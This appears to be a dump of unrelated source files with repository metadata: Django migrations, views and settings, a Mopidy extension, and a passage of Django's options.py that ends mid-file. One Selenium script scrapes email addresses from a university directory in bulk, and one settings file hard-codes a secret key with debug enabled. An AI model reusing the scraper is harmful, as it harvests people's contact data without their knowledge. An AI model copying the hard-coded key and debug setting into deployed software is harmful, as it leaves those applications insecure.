|
/src/aids/migrations/0080_auto_20191104_1028.py
|
e61367fa67ca3885c3616e240f880421e5dac253
|
[] |
no_license
|
samuelpath/aides-territoires
|
399a6a7b0607ef5a8d2b327247446b239f5b1a42
|
5793bd49d7157a34e08c29e56a46e1e3ead0651f
|
refs/heads/master
| 2022-12-20T14:35:18.671563
| 2020-08-21T08:00:33
| 2020-08-21T08:00:33
| 288,424,578
| 0
| 0
| null | 2020-08-18T10:27:17
| 2020-08-18T10:27:16
| null |
UTF-8
|
Python
| false
| false
| 389
|
py
|
# Generated by Django 2.2.5 on 2019-11-04 09:28
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('aids', '0079_remove_aid_subvention_rate'),
]
operations = [
migrations.RenameField(
model_name='aid',
old_name='subvention_rate_range',
new_name='subvention_rate',
),
]
|
[
"thibault@miximum.fr"
] |
thibault@miximum.fr
|
33104e73737bbe56ef8c3d00a5ce6c987ad8d4d4
|
0898c718513c9330eae5907f49badcce3ff35a70
|
/excel/bostonPlans/lacrosse.py
|
434b110fc38e4407939612c9b3febbea38b353dd
|
[] |
no_license
|
andrefisch/EvanProjects
|
00035dc0cb99f318e15509b4a8cf7d8995230e08
|
1ab958fd5d7a5d8485e506e60e77756775399579
|
refs/heads/master
| 2021-07-13T11:06:47.475143
| 2018-08-07T23:55:24
| 2018-08-07T23:55:24
| 133,861,990
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,136
|
py
|
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import openpyxl
import re
import pygame, time
xfile = openpyxl.load_workbook('uwlc.xlsx')
sheet = xfile.get_sheet_by_name('2021')
start = 2
end = 102
driver = webdriver.Chrome()
driver.get("https://www.uwlax.edu/info/directory/")
driver.switch_to.frame(0)
for row in range (start, end):
lastName = sheet['A' + str(row)].value
firstName = sheet['B' + str(row)].value
inputElement = driver.find_element_by_id("search_criteria")
inputElement.clear()
inputElement.send_keys(firstName + " " + lastName)
inputElement.send_keys(Keys.ENTER)
html = driver.page_source
p = re.compile('[\w\.]*@\w*uwlax\.edu')
m = p.search(html)
if '<table class="table table-striped color-h" id="resultsTable">' in str(html):
try:
sheet['C' + str(row)] = m.group()
# Keep track of how close we are to being done
print (str(format((row - start) / (end - start) * 100.00, '.2f')) + "%: " + m.group())
except Exception:
pass
xfile.save('test.xlsx')
|
[
"anfischl@gmail.com"
] |
anfischl@gmail.com
|
1b5469bcc3dcfd7fd76a8161c26dc9392a65bff6
|
5409369b91fab5cae896e141acb84add2f5948d9
|
/mopidy_iris/__init__.py
|
e190cb70713d94f543dd0d8d119b4f1072ef272b
|
[
"Apache-2.0"
] |
permissive
|
janza/Iris
|
8c4a6c003f3d782aa9da50b52f8992f521c9ca5a
|
7452c743ba4493f42cb80549710aaf9119e1606d
|
refs/heads/master
| 2021-01-17T08:23:46.823679
| 2017-03-27T13:16:24
| 2017-03-27T13:16:24
| 83,895,941
| 0
| 0
| null | 2017-03-04T13:38:51
| 2017-03-04T13:38:51
| null |
UTF-8
|
Python
| false
| false
| 2,052
|
py
|
from __future__ import unicode_literals
import logging, os, json
import tornado.web
import tornado.websocket
import handlers
import mem  # shared in-memory state used below (assumed to be a sibling module of this package)
from mopidy import config, ext
from frontend import IrisFrontend
from handlers import WebsocketHandler, HttpHandler
from core import IrisCore
logger = logging.getLogger(__name__)
__version__ = '2.13.1'
##
# Core extension class
#
# Loads config and gets the party started. Initiates any additional frontends, etc.
##
class Extension( ext.Extension ):
dist_name = 'Mopidy-Iris'
ext_name = 'iris'
version = __version__
def get_default_config(self):
conf_file = os.path.join(os.path.dirname(__file__), 'ext.conf')
return config.read(conf_file)
def get_config_schema(self):
schema = config.ConfigSchema(self.ext_name)
schema['enabled'] = config.Boolean()
schema['pusherport'] = config.String()
schema['country'] = config.String()
schema['locale'] = config.String()
return schema
def setup(self, registry):
# Add web extension
registry.add('http:app', {
'name': self.ext_name,
'factory': iris_factory
})
# create our core instance
mem.iris = IrisCore()
mem.iris.version = self.version
# Add our frontend
registry.add('frontend', IrisFrontend)
def iris_factory(config, core):
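    # Tornado routes for this extension: images from the local image directory, the HTTP API,
    # the websocket endpoint, and the static web client.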
path = os.path.join( os.path.dirname(__file__), 'static')
return [
(r"/images/(.*)", tornado.web.StaticFileHandler, {
'path': config['local-images']['image_dir']
}),
(r'/http/([^/]*)', handlers.HttpHandler, {
'core': core,
'config': config
}),
(r'/ws/?', handlers.WebsocketHandler, {
'core': core,
'config': config
}),
(r'/(.*)', tornado.web.StaticFileHandler, {
'path': path,
'default_filename': 'index.html'
}),
]
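# Hedged illustration (editor addition, not part of Mopidy-Iris): an [iris] section
# matching get_config_schema() above could look like the following; the concrete
# values are assumptions for illustration only.
#
#   [iris]
#   enabled = true
#   pusherport = 6681
#   country = nz
#   locale = en_NZ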
|
[
"james@barnsley.nz"
] |
james@barnsley.nz
|
b6cc6b09c13e8614d893dc963a6d721790d09177
|
9b70764296a8144a6e7d0461b9f44b3292b54ddb
|
/Week_4/getRatios.py
|
3400bf5f32ab7d1ff3376cf0abb0ae0adc1eac43
|
[] |
no_license
|
scolon7251/edX_6.00.1x
|
a0d561fdc52d7161c4752a92fc2589c0ab9d7cf4
|
735b19b2cc9ab5dbc3463806e972a6a96e03a874
|
refs/heads/master
| 2020-12-24T14:36:23.169568
| 2015-03-25T23:13:35
| 2015-03-25T23:13:35
| 32,895,207
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 468
|
py
|
def getRatios(v1, v2):
"""Assumes v1 and v2 are lists of equal length of numbers
Returns a list containing the meaningful values of
v1[i]/v2[i]"""
ratios = []
for index in range(len(v1)):
try:
ratios.append(v1[index]/float(v2[index]))
except ZeroDivisionError:
ratios.append(float('NaN'))#NaN = Not a number
except:
raise ValueError('getRatios called with bad arg')
return ratios
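# Hedged usage sketch (editor addition, not part of the original file): exercising
# the ZeroDivisionError branch described in the docstring above.
if __name__ == '__main__':
    print(getRatios([1.0, 2.0, 7.0, 6.0], [1.0, 2.0, 0.0, 3.0]))
    # expected output: [1.0, 1.0, nan, 2.0]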
|
[
"scolon725@gmail.com"
] |
scolon725@gmail.com
|
bfbb5c0eb21e5ad2b2ad226fbe7a3e9d2d558aef
|
cfa1c211bcd8b5bba82749e5936fd50f619c80af
|
/Hackaton15/settings.py
|
5dba4f251bd83c561e05d4d7dad962b2964270e6
|
[] |
no_license
|
yedtoss/dreamrankings
|
1b9ffee330177c6c00d7922d9179e4cf35336bfd
|
9324fc93afb4a20d51d0ea9ae6ce66d25e9d13b6
|
refs/heads/master
| 2021-01-10T01:06:10.964747
| 2015-11-10T15:06:10
| 2015-11-10T15:06:10
| 45,914,647
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,927
|
py
|
"""
Django settings for Hackaton15 project.
Generated by 'django-admin startproject' using Django 1.8.6.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
PROJECT_PATH = os.path.realpath(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'a3dr_ud59+o3hi8x%8ev36m)@toi8-0w51hf+qp@9$%j9))%vu'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'ranktc',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
)
ROOT_URLCONF = 'Hackaton15.urls'
#TEMPLATE_DIRS = (
# PROJECT_PATH + '/templates/',
#)
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [BASE_DIR + '/templates/'],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'Hackaton15.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = (
os.path.join(BASE_DIR, "static"),
)
RATING_IMG = os.path.join(BASE_DIR, "static/ratings-img")
|
[
"yedtoss@Aristides-MacBook-Pro.local"
] |
yedtoss@Aristides-MacBook-Pro.local
|
1e838cff1c3206fca261549ede085035a1794d7c
|
b301f5d799fb973f12ff457c94a3fb54f5c6fd6b
|
/pages/views.py
|
56e3848a96f39428eb0488fb6874d562f048fe72
|
[] |
no_license
|
MahmudulHassan5809/DjangoHousingSellingProject
|
ca3a8b9e3d83dd87532b33295e56e50ba7e9576d
|
82d02e04fe2a0cd510f160ad4159f40f4e5779d3
|
refs/heads/master
| 2020-04-09T08:01:41.092034
| 2018-12-03T11:24:13
| 2018-12-03T11:24:13
| 160,179,800
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 852
|
py
|
from django.shortcuts import render,redirect
from django.http import HttpResponse
from listings.choices import price_choices , bedroom_choices , state_choices
from listings.models import Listing
from realtors.models import Realtor
# Create your views here.
def index(request):
    # return HttpResponse('Hello')
    listings = Listing.objects.order_by('-list_date').filter(is_published=True)
return render(request , 'pages/index.html',{'listings' : listings ,
'state_choices' : state_choices,
'bedroom_choices' : bedroom_choices,
'price_choices' : price_choices,
})
def about(request):
realtors = Realtor.objects.order_by('-hire_date')
mvp_realtors = Realtor.objects.all().filter(is_mvp=True)
context = {
'realtors' : realtors,
'mvp_realtors' : mvp_realtors
}
return render(request , 'pages/about.html',context)
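# Hedged sketch (editor addition, not part of the project): a pages/urls.py wiring
# up the two views above might look like this; the route strings and names are
# assumptions, and django.urls.path assumes Django >= 2.0.
#
#   from django.urls import path
#   from . import views
#
#   urlpatterns = [
#       path('', views.index, name='index'),
#       path('about/', views.about, name='about'),
#   ]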
|
[
"mahmudul.hassan240@gmail.com"
] |
mahmudul.hassan240@gmail.com
|
1847478ec8b70f2924f186647354c35f7436bee4
|
d1fa29de428e6df1def8efc33323a4ee8e51074d
|
/s60.py
|
1e52334af47fe5dd53628e2f142f43a45e914afc
|
[] |
no_license
|
Gunasundarinagalingam/positive
|
d0cd729824ebef009d2eced065ec7d81026b69cd
|
4829009c2abd214a58254e555043046117db8562
|
refs/heads/master
| 2020-06-02T15:13:38.476791
| 2019-07-21T15:02:49
| 2019-07-21T15:02:49
| 191,204,498
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 68
|
py
|
num=int(input())
xx=0
while(num>0):
xx=xx+num
num=num-1
print(xx)
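# Editor note (hedged): the loop above accumulates 1 + 2 + ... + num, i.e. the
# triangular number, so the closed form num * (num + 1) // 2 (evaluated on the
# original input) gives the same result.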
|
[
"noreply@github.com"
] |
Gunasundarinagalingam.noreply@github.com
|
99129434172fa0c521b49b6f4febfde4aa1ad958
|
80389757e4222748bb6b1ae84b7519454539fb99
|
/filrefoxFile.py
|
e96b530cb7d706bc9cde450ac8f1394c517e31c6
|
[] |
no_license
|
Prajna14/SeleniumBasics1
|
7c3fe4929eb50cd9d745775e2e62c5d864436667
|
cba0a34222ef24fd1ad54c1b53d8dcbba906b0ad
|
refs/heads/master
| 2020-04-26T12:34:27.447246
| 2019-03-23T12:38:42
| 2019-03-23T12:38:42
| 173,554,180
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 184
|
py
|
from selenium import webdriver
qspiders = webdriver.Firefox(executable_path="C:\\Users\\prajn\\Downloads\\geckodriver-v0.24.0-win64\\geckodriver.exe")
qspiders.get("http://google.com")
|
[
"prajnakornaya14@gmail.com"
] |
prajnakornaya14@gmail.com
|
40fec2d844ff14fbb903f58d6e96f8e46ad3fe8c
|
f83934dd60d4961848c0a86f6d7fbe07b79a1d63
|
/glumpy/graphics/collections/__init__.py
|
c497f742a32eb93341c0ab317f56e2fc37a848d5
|
[] |
no_license
|
brianholland/glumpy
|
2a31e2f5fd039d1debb30dd010ad36c458f329cf
|
a691082385e02db9b1d461847b9e36d8534630fa
|
refs/heads/master
| 2020-12-25T21:43:58.743259
| 2015-11-30T11:04:46
| 2015-11-30T11:04:46
| 46,670,630
| 0
| 0
| null | 2015-11-30T11:04:46
| 2015-11-22T17:10:24
|
Python
|
UTF-8
|
Python
| false
| false
| 951
|
py
|
# -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# Copyright (c) 2014, Nicolas P. Rougier. All rights reserved.
# Distributed under the terms of the new BSD License.
# -----------------------------------------------------------------------------
from . collection import Collection
from . base_collection import BaseCollection
from . path_collection import PathCollection
from . point_collection import PointCollection
from . glyph_collection import GlyphCollection
from . marker_collection import MarkerCollection
from . polygon_collection import PolygonCollection
from . segment_collection import SegmentCollection
from . triangle_collection import TriangleCollection
from . raw_path_collection import RawPathCollection
from . raw_triangle_collection import RawTriangleCollection
from . agg_path_collection import AggPathCollection
from . agg_fast_path_collection import AggFastPathCollection
|
[
"Nicolas.Rougier@inria.fr"
] |
Nicolas.Rougier@inria.fr
|
03fab0a9c754d5052f140abd4b69c247baa784f5
|
acbdf6089c248d1719f95208cbb43a9bcb4a2631
|
/alatool/forms.py
|
cd9bd264f27be45bf682b00d2612a8aa5920e276
|
[] |
no_license
|
yoshi-ashi/alatool
|
0c8aed13565598024181218b3d80de18d75c651f
|
d39cfa9cde9e0a70c54cede5ff4522c73d11e623
|
refs/heads/master
| 2022-12-26T23:15:45.328771
| 2020-09-25T06:42:57
| 2020-09-25T06:42:57
| 296,534,482
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 698
|
py
|
from django.forms import ModelForm
from .models import MatchRecord
from django import forms
class DateInput(forms.DateInput):
input_type = 'date'
# NOTE: despite its name, this widget subclasses DateInput and is not used below;
# the Meta.widgets mapping uses forms.Textarea for the 'comment' field instead.
class TextAreaInput(forms.DateInput):
    input_type = 'textarea'
class SampleForm(ModelForm):
class Meta:
model = MatchRecord
fields = [
'game_name',
'game_date',
'my_title',
'opp_title',
'win_lose',
'comment',
'frirst_strike',
'battle_division'
]
widgets = {
'game_date': DateInput(),
'comment':forms.Textarea(attrs={'rows':4,})
}
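# Hedged usage sketch (editor addition, not part of the project): handling the form
# in a view; the view name, template path and redirect target are assumptions.
#
#   from django.shortcuts import render, redirect
#
#   def record_create(request):
#       form = SampleForm(request.POST or None)
#       if request.method == 'POST' and form.is_valid():
#           form.save()
#           return redirect('record_list')   # hypothetical URL name
#       return render(request, 'alatool/record_form.html', {'form': form})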
|
[
"yshstny102@gmail.com"
] |
yshstny102@gmail.com
|
a94e1bb1dc306e6a03ea0107933cb542bdaea003
|
50671b3e4e8ed7e9702c9941bb71fdbf92dffbe6
|
/src/cogs/events.py
|
0b28700d34057dbeef8be93aeb3c40ea8a08314b
|
[] |
no_license
|
pikoUsername/Emulator
|
3dd67d0d3934c2ec9283b9b52edebec31c654326
|
96e6563c7cbcea051e4e41a377d917a2a9f5528a
|
refs/heads/main
| 2023-02-27T22:42:43.154987
| 2021-02-09T14:51:56
| 2021-02-09T14:51:56
| 321,045,486
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,199
|
py
|
import os
import sys
from discord.ext import commands
from discord.ext.commands import errors
import discord
from loguru import logger
from ..models import Guild
from ..utils.notify import notify_all_owners
class DiscordEvents(commands.Cog, name="Events"):
__slots__ = "bot",
def __init__(self, bot):
self.bot = bot
@commands.Cog.listener()
async def on_ready(self):
if os.environ.get("notify_admins"):
await notify_all_owners(self.bot, text="BOT STARTED")
@commands.Cog.listener()
async def on_guild_join(self, guild: discord.Guild):
g = await Guild.query.where(guild.id == Guild.guild_id).gino.first()
g.add_guild(guild)
@commands.Cog.listener()
async def on_guild_remove(self, guild: discord.Guild):
await self.bot.fm.delete_all_guild_files(guild.id)
g = await Guild.get_guild(guild.id)
await g.delete()
logger.info("leaved and deleted thats guild folder")
@commands.Cog.listener()
async def on_command_error(self, ctx, err):
if isinstance(err, errors.MissingRequiredArgument) or isinstance(err, errors.BadArgument):
helper = str(ctx.invoked_subcommand) if ctx.invoked_subcommand else str(ctx.command)
await ctx.send_help(helper)
elif isinstance(err, errors.CommandInvokeError):
logger.exception(f"{err}, {sys.exc_info()}")
if "2000 or fewer" in str(err) and len(ctx.message.clean_content) > 1900:
return await ctx.send(
"You attempted to make the command display more than 2,000 characters...\n"
"Both error and command will be ignored."
)
await ctx.send(embed=discord.Embed(
title="Error on processing Command",
description=f"```{err}```",
), delete_after=30)
elif isinstance(err, errors.MissingPermissions):
await ctx.send(embed=discord.Embed(
title=f"Fail {self.bot.X_EMOJI}",
description="Permission ERROR"))
elif isinstance(err, errors.CheckFailure):
await ctx.send(embed=discord.Embed(
title=f"Fail {self.bot.X_EMOJI}",
description="You cant made this"))
elif isinstance(err, errors.MaxConcurrencyReached):
await ctx.send(
"You've reached max capacity of command usage at once, please finish the previous one...",
delete_after=30)
elif isinstance(err, errors.CommandOnCooldown):
await ctx.send(
f"This command is on cool down... try again in {err.retry_after:.2f} seconds.",
delete_after=30)
elif isinstance(err, errors.CommandNotFound):
pass
elif isinstance(err, errors.NoPrivateMessage):
await ctx.send(
embed=discord.Embed(title="Private message Not work",
description="Bot work only in guild channels"))
else:
logger.exception(err)
await self.bot.send_error(ctx, err)
def setup(bot):
bot.add_cog(DiscordEvents(bot))
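# Hedged usage sketch (editor addition): loading this cog from the bot's entry
# point via discord.py's standard extension mechanism; the dotted path is an
# assumption based on this file living at src/cogs/events.py.
#
#   bot.load_extension("src.cogs.events")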
|
[
"galymzhan.amantaj@gmail.com"
] |
galymzhan.amantaj@gmail.com
|
bac7da100bdffb4311f4f9773f9d16c5da4d46e5
|
6e3843071082065f7ab638af2928813be44ad97b
|
/virtual/lib/python3.6/site-packages/django/db/models/options.py
|
b64987a3a0ea3f486ba438a28eabd553908ce7e6
|
[
"MIT",
"BSD-3-Clause"
] |
permissive
|
Ingabineza12/awwwards
|
ebf3d8e21662d491b78ee5db28543e7a09ca8f0a
|
5fe83ed0820e47617f32b28a3f6f5e5a4f27e47b
|
refs/heads/master
| 2023-02-22T10:23:33.887887
| 2021-01-25T07:37:47
| 2021-01-25T07:37:47
| 331,918,339
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 36,854
|
py
|
from __future__ import unicode_literals
import copy
import warnings
from bisect import bisect
from collections import OrderedDict, defaultdict
from itertools import chain
from django.apps import apps
from django.conf import settings
from django.core.exceptions import FieldDoesNotExist
from django.db import connections
from django.db.models import Manager
from django.db.models.fields import AutoField
from django.db.models.fields.proxy import OrderWrt
from django.db.models.query_utils import PathInfo
from django.utils import six
from django.utils.datastructures import ImmutableList, OrderedSet
from django.utils.deprecation import (
RemovedInDjango20Warning, RemovedInDjango21Warning,
warn_about_renamed_method,
)
from django.utils.encoding import force_text, python_2_unicode_compatible
from django.utils.functional import cached_property
from django.utils.text import camel_case_to_spaces, format_lazy
from django.utils.translation import override
NOT_PROVIDED = object()
PROXY_PARENTS = object()
EMPTY_RELATION_TREE = tuple()
IMMUTABLE_WARNING = (
"The return type of '%s' should never be mutated. If you want to manipulate this list "
"for your own use, make a copy first."
)
DEFAULT_NAMES = (
'verbose_name', 'verbose_name_plural', 'db_table', 'ordering',
'unique_together', 'permissions', 'get_latest_by', 'order_with_respect_to',
'app_label', 'db_tablespace', 'abstract', 'managed', 'proxy', 'swappable',
'auto_created', 'index_together', 'apps', 'default_permissions',
'select_on_save', 'default_related_name', 'required_db_features',
'required_db_vendor', 'base_manager_name', 'default_manager_name',
'manager_inheritance_from_future', 'indexes',
)
def normalize_together(option_together):
"""
option_together can be either a tuple of tuples, or a single
tuple of two strings. Normalize it to a tuple of tuples, so that
calling code can uniformly expect that.
"""
try:
if not option_together:
return ()
if not isinstance(option_together, (tuple, list)):
raise TypeError
first_element = next(iter(option_together))
if not isinstance(first_element, (tuple, list)):
option_together = (option_together,)
# Normalize everything to tuples
return tuple(tuple(ot) for ot in option_together)
except TypeError:
# If the value of option_together isn't valid, return it
# verbatim; this will be picked up by the check framework later.
return option_together
def make_immutable_fields_list(name, data):
return ImmutableList(data, warning=IMMUTABLE_WARNING % name)
@python_2_unicode_compatible
class Options(object):
FORWARD_PROPERTIES = {
'fields', 'many_to_many', 'concrete_fields', 'local_concrete_fields',
'_forward_fields_map', 'managers', 'managers_map', 'base_manager',
'default_manager',
}
REVERSE_PROPERTIES = {'related_objects', 'fields_map', '_relation_tree'}
default_apps = apps
def __init__(self, meta, app_label=None):
self._get_fields_cache = {}
self.local_fields = []
self.local_many_to_many = []
self.private_fields = []
self.manager_inheritance_from_future = False
self.local_managers = []
self.base_manager_name = None
self.default_manager_name = None
self.model_name = None
self.verbose_name = None
self.verbose_name_plural = None
self.db_table = ''
self.ordering = []
self._ordering_clash = False
self.indexes = []
self.unique_together = []
self.index_together = []
self.select_on_save = False
self.default_permissions = ('add', 'change', 'delete')
self.permissions = []
self.object_name = None
self.app_label = app_label
self.get_latest_by = None
self.order_with_respect_to = None
self.db_tablespace = settings.DEFAULT_TABLESPACE
self.required_db_features = []
self.required_db_vendor = None
self.meta = meta
self.pk = None
self.auto_field = None
self.abstract = False
self.managed = True
self.proxy = False
# For any class that is a proxy (including automatically created
# classes for deferred object loading), proxy_for_model tells us
# which class this model is proxying. Note that proxy_for_model
# can create a chain of proxy models. For non-proxy models, the
# variable is always None.
self.proxy_for_model = None
# For any non-abstract class, the concrete class is the model
# in the end of the proxy_for_model chain. In particular, for
# concrete models, the concrete_model is always the class itself.
self.concrete_model = None
self.swappable = None
self.parents = OrderedDict()
self.auto_created = False
# List of all lookups defined in ForeignKey 'limit_choices_to' options
# from *other* models. Needed for some admin checks. Internal use only.
self.related_fkey_lookups = []
# A custom app registry to use, if you're making a separate model set.
self.apps = self.default_apps
self.default_related_name = None
@property
def label(self):
return '%s.%s' % (self.app_label, self.object_name)
@property
def label_lower(self):
return '%s.%s' % (self.app_label, self.model_name)
@property
def app_config(self):
# Don't go through get_app_config to avoid triggering imports.
return self.apps.app_configs.get(self.app_label)
@property
def installed(self):
return self.app_config is not None
def contribute_to_class(self, cls, name):
from django.db import connection
from django.db.backends.utils import truncate_name
cls._meta = self
self.model = cls
# First, construct the default values for these options.
self.object_name = cls.__name__
self.model_name = self.object_name.lower()
self.verbose_name = camel_case_to_spaces(self.object_name)
# Store the original user-defined values for each option,
# for use when serializing the model definition
self.original_attrs = {}
# Next, apply any overridden values from 'class Meta'.
if self.meta:
meta_attrs = self.meta.__dict__.copy()
for name in self.meta.__dict__:
# Ignore any private attributes that Django doesn't care about.
# NOTE: We can't modify a dictionary's contents while looping
# over it, so we loop over the *original* dictionary instead.
if name.startswith('_'):
del meta_attrs[name]
for attr_name in DEFAULT_NAMES:
if attr_name in meta_attrs:
setattr(self, attr_name, meta_attrs.pop(attr_name))
self.original_attrs[attr_name] = getattr(self, attr_name)
elif hasattr(self.meta, attr_name):
setattr(self, attr_name, getattr(self.meta, attr_name))
self.original_attrs[attr_name] = getattr(self, attr_name)
self.unique_together = normalize_together(self.unique_together)
self.index_together = normalize_together(self.index_together)
# verbose_name_plural is a special case because it uses a 's'
# by default.
if self.verbose_name_plural is None:
self.verbose_name_plural = format_lazy('{}s', self.verbose_name)
            # order_with_respect_to and ordering are mutually exclusive.
self._ordering_clash = bool(self.ordering and self.order_with_respect_to)
# Any leftover attributes must be invalid.
# if meta_attrs != {}:
# raise TypeError("'class Meta' got invalid attribute(s): %s" % ','.join(meta_attrs.keys()))
else:
self.verbose_name_plural = format_lazy('{}s', self.verbose_name)
del self.meta
# If the db_table wasn't provided, use the app_label + model_name.
if not self.db_table:
self.db_table = "%s_%s" % (self.app_label, self.model_name)
self.db_table = truncate_name(self.db_table, connection.ops.max_name_length())
def _prepare(self, model):
if self.order_with_respect_to:
# The app registry will not be ready at this point, so we cannot
# use get_field().
query = self.order_with_respect_to
try:
self.order_with_respect_to = next(
f for f in self._get_fields(reverse=False)
if f.name == query or f.attname == query
)
except StopIteration:
raise FieldDoesNotExist("%s has no field named '%s'" % (self.object_name, query))
self.ordering = ('_order',)
if not any(isinstance(field, OrderWrt) for field in model._meta.local_fields):
model.add_to_class('_order', OrderWrt())
else:
self.order_with_respect_to = None
if self.pk is None:
if self.parents:
# Promote the first parent link in lieu of adding yet another
# field.
field = next(six.itervalues(self.parents))
# Look for a local field with the same name as the
# first parent link. If a local field has already been
# created, use it instead of promoting the parent
already_created = [fld for fld in self.local_fields if fld.name == field.name]
if already_created:
field = already_created[0]
field.primary_key = True
self.setup_pk(field)
if not field.remote_field.parent_link:
warnings.warn(
'Add parent_link=True to %s as an implicit link is '
'deprecated.' % field, RemovedInDjango20Warning
)
else:
auto = AutoField(verbose_name='ID', primary_key=True, auto_created=True)
model.add_to_class('id', auto)
def add_manager(self, manager):
self.local_managers.append(manager)
self._expire_cache()
def add_field(self, field, private=False, virtual=NOT_PROVIDED):
if virtual is not NOT_PROVIDED:
warnings.warn(
"The `virtual` argument of Options.add_field() has been renamed to `private`.",
RemovedInDjango20Warning, stacklevel=2
)
private = virtual
# Insert the given field in the order in which it was created, using
# the "creation_counter" attribute of the field.
# Move many-to-many related fields from self.fields into
# self.many_to_many.
if private:
self.private_fields.append(field)
elif field.is_relation and field.many_to_many:
self.local_many_to_many.insert(bisect(self.local_many_to_many, field), field)
else:
self.local_fields.insert(bisect(self.local_fields, field), field)
self.setup_pk(field)
# If the field being added is a relation to another known field,
# expire the cache on this field and the forward cache on the field
# being referenced, because there will be new relationships in the
# cache. Otherwise, expire the cache of references *to* this field.
# The mechanism for getting at the related model is slightly odd -
# ideally, we'd just ask for field.related_model. However, related_model
# is a cached property, and all the models haven't been loaded yet, so
# we need to make sure we don't cache a string reference.
if field.is_relation and hasattr(field.remote_field, 'model') and field.remote_field.model:
try:
field.remote_field.model._meta._expire_cache(forward=False)
except AttributeError:
pass
self._expire_cache()
else:
self._expire_cache(reverse=False)
def setup_pk(self, field):
if not self.pk and field.primary_key:
self.pk = field
field.serialize = False
def setup_proxy(self, target):
"""
Does the internal setup so that the current model is a proxy for
"target".
"""
self.pk = target._meta.pk
self.proxy_for_model = target
self.db_table = target._meta.db_table
def __repr__(self):
return '<Options for %s>' % self.object_name
def __str__(self):
return "%s.%s" % (self.app_label, self.model_name)
def can_migrate(self, connection):
"""
Return True if the model can/should be migrated on the `connection`.
`connection` can be either a real connection or a connection alias.
"""
if self.proxy or self.swapped or not self.managed:
return False
if isinstance(connection, six.string_types):
connection = connections[connection]
if self.required_db_vendor:
return self.required_db_vendor == connection.vendor
if self.required_db_features:
return all(getattr(connection.features, feat, False)
for feat in self.required_db_features)
return True
@property
def verbose_name_raw(self):
"""
There are a few places where the untranslated verbose name is needed
(so that we get the same value regardless of currently active
locale).
"""
with override(None):
return force_text(self.verbose_name)
@property
def swapped(self):
"""
Has this model been swapped out for another? If so, return the model
name of the replacement; otherwise, return None.
For historical reasons, model name lookups using get_model() are
case insensitive, so we make sure we are case insensitive here.
"""
if self.swappable:
swapped_for = getattr(settings, self.swappable, None)
if swapped_for:
try:
swapped_label, swapped_object = swapped_for.split('.')
except ValueError:
# setting not in the format app_label.model_name
# raising ImproperlyConfigured here causes problems with
# test cleanup code - instead it is raised in get_user_model
# or as part of validation.
return swapped_for
if '%s.%s' % (swapped_label, swapped_object.lower()) != self.label_lower:
return swapped_for
return None
@cached_property
def managers(self):
managers = []
seen_managers = set()
bases = (b for b in self.model.mro() if hasattr(b, '_meta'))
for depth, base in enumerate(bases):
for manager in base._meta.local_managers:
if manager.name in seen_managers:
continue
manager = copy.copy(manager)
manager.model = self.model
seen_managers.add(manager.name)
managers.append((depth, manager.creation_counter, manager))
# Used for deprecation of legacy manager inheritance,
# remove afterwards. (RemovedInDjango20Warning)
manager._originating_model = base
return make_immutable_fields_list(
"managers",
(m[2] for m in sorted(managers)),
)
@cached_property
def managers_map(self):
return {manager.name: manager for manager in self.managers}
@cached_property
def base_manager(self):
base_manager_name = self.base_manager_name
if not base_manager_name:
# Get the first parent's base_manager_name if there's one.
for parent in self.model.mro()[1:]:
if hasattr(parent, '_meta'):
if parent._base_manager.name != '_base_manager':
base_manager_name = parent._base_manager.name
break
if base_manager_name:
try:
return self.managers_map[base_manager_name]
except KeyError:
raise ValueError(
"%s has no manager named %r" % (
self.object_name,
base_manager_name,
)
)
# Deprecation shim for `use_for_related_fields`.
for i, base_manager_class in enumerate(self.default_manager.__class__.mro()):
if getattr(base_manager_class, 'use_for_related_fields', False):
if not getattr(base_manager_class, 'silence_use_for_related_fields_deprecation', False):
warnings.warn(
"use_for_related_fields is deprecated, instead "
